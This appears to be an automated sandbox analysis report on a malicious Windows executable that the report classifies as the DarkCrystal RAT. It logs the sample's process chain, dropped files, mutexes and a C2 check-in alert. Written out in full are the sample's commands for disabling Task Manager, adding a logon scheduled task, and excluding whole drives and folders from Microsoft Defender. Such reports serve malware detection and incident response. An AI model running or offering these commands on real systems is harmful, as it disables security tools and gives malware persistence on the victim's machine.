Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError | 0_2_001EA69B
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW | 0_2_001FC220
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File opened: C:\Users\user
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File opened: C:\Users\user\AppData
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File opened: C:\Users\user\AppData\Local

Software Vulnerabilities

Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: Network traffic | Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49804 -> 37.44.238.250:80
Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: ComComponentDriverInto.exe, 00000008.00000002.2014307419.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E516000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9AE06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4EC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.000001954A1F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C997A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4A3C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAD76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DD1F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84325000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF7FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753588000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD83B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80226000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000022.00000002.2379739364.000001CD4E2F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2398687639.0000018B9ABE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2428059810.0000016DE4CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2338348477.0000019549FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2289954354.0000021880001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2293537721.0000022253B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2334316406.0000023C99581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2304228771.000001ED80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000031.00000002.2403734141.0000029DE4741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2343888800.000001FBDAB51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000034.00000002.2368397423.00000137DCFD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000037.00000002.2284348804.000001AE84101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2350718445.000001D936D11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003B.00000002.2431714100.00000137DF441000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.2303800756.000001FA00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2354040247.000002B753361000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003F.00000002.2315204549.000002BDD81A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2304030379.0000021E80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000042.00000002.2280022816.0000022980001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000042.00000002.2280022816.0000022980228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester

                        System Summary

Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001E848E
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F6CDC
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F4088
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F00B7
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001E40FE
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F7153
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_002051C9
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F62CA
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001E32F7
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F43BF
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001EC426
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_0020D440
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001EF461
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F77EF
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001E286B
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_0020D8EE
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001EE9B7
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_002119F4
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001F3E0B
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_00204F9A
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001EEFE2
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Code function: 8_2_00007FFD9BAB0D48
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Code function: 8_2_00007FFD9BAB0E43
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Code function: 8_2_00007FFD9BEB1395
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Code function: 81_2_00007FFD9BAA0D48
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Code function: 81_2_00007FFD9BAA0E43
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\AdxdALuR.log DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: String function: 001FEB78 appears 39 times
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: String function: 001FEC50 appears 56 times
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: String function: 001FF5F0 appears 31 times
Source: izOFSTgA.log.8.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: KzLetzDiM8.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: ComComponentDriverInto.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OXiaaPzsOIsoqrAHYxAVs.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: sihost.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ComComponentDriverInto.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@89/107@0/0
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001E6C74 GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Code function: 0_2_001FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\Desktop\izOFSTgA.log
Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2124:120:WilError_03
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-LbnYnrAFsRBRgFiNODVy
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | File created: C:\Users\user\AppData\Local\Temp\l4lihvv4
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Command line argument: sfxname (0_2_001FDF1E)
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Command line argument: sfxstime (0_2_001FDF1E)
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Command line argument: STARTDLG (0_2_001FDF1E)
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Command line argument: xz# (0_2_001FDF1E)
Source: KzLetzDiM8.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 identical entries)
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: KzLetzDiM8.exe | Virustotal: Detection: 51%
Source: KzLetzDiM8.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | File read: C:\Users\user\Desktop\KzLetzDiM8.exe
Source: unknown | Process created: C:\Users\user\Desktop\KzLetzDiM8.exe "C:\Users\user\Desktop\KzLetzDiM8.exe"
Source: C:\Users\user\Desktop\KzLetzDiM8.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\fontdriversavescrt\VC6VnT3ED3x5xNRNDrSFzjvQXKeB6kXLUZIf41P3hi0I8ZK.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\fontdriversavescrt\EgkshvK6qarKZkry.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\fontdriversavescrt\ComComponentDriverInto.exe "C:\fontdriversavescrt/ComComponentDriverInto.exe"
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l4lihvv4\l4lihvv4.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC076.tmp" "c:\Windows\System32\CSC2AA1D359FACC4CB2A858F49C46B13997.TMP"
Source: unknown | Process created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\sihost.exe'" /rl HIGHEST /f
Source: unknown | Process created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontdriversavescrt/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\WmiPrvSE.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\Documents\sihost.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontdriversavescrt\ComComponentDriverInto.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\fontdriversavescrt\ComComponentDriverInto.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\h43HaGdPC8.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
Source: unknown | Process created: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exe
Source: unknown | Process created: C:\Users\Default\Documents\sihost.exe "C:\Users\Default User\Documents\sihost.exe"
Source: unknown | Process created: C:\Users\Default\Documents\sihost.exe "C:\Users\Default User\Documents\sihost.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe "C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe"
